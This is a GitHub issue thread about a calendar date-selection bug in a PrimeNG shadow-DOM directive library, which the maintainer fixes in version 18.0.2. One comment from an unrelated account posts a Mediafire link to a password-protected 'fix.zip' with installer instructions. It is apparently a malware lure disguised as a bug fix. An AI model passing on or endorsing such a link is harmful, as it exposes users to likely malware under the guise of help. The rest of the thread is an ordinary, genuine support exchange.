### ISSUE TITLE
Calendar: cannot select date

### ISSUE THREAD

**Issue by eduardoleopoldino** [maitrungduc1410/primeng-shadowdom-directives#17]
Hello @maitrungduc1410 

When you select a date inside the calendar dialog, the value is not persisted in the field.
This problem can be seen in your page examples.

Do you think this is something you can fix with the pdsCalendar directive?
If not, do you have any workarounds for this bug?

Thank you

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by maitrungduc1410** [comment]
thanks for letting me know, I'll check and fix this

**Comment by eduardoleopoldino** [comment]
Hello @maitrungduc1410 
I've just tested you "old" implementation of the psdCalendar directive on the latest version and it works.
Any particular reason why you removed this in the first place?

thank you

**Comment by maitrungduc1410** [comment]
The demo is kept updating with latest version of Angular.

And the code is changing to align with internal implementation of Primeng (sometimes they have breaking change, like from 15->16)

**Comment by maitrungduc1410** [comment]
Probably I missed some part

**Comment by eduardoleopoldino** [comment]
Got it. Thanks!

Can you make the change and publish a new version?
If you want, I can fork the project and create a PR.

**Comment by maitrungduc1410** [comment]
I fixed the issue, please upgrade to 18.0.2, the demo also redeployed.

Thanks for letting me know, this is due to a mistake when doing testing, then I thought the directive for Calendar is not needed, but then it's indeed needed

**Comment by eduardoleopoldino** [comment]
I've just tested it and it works great. 

Thank you for the help and all the effort to create this package :)
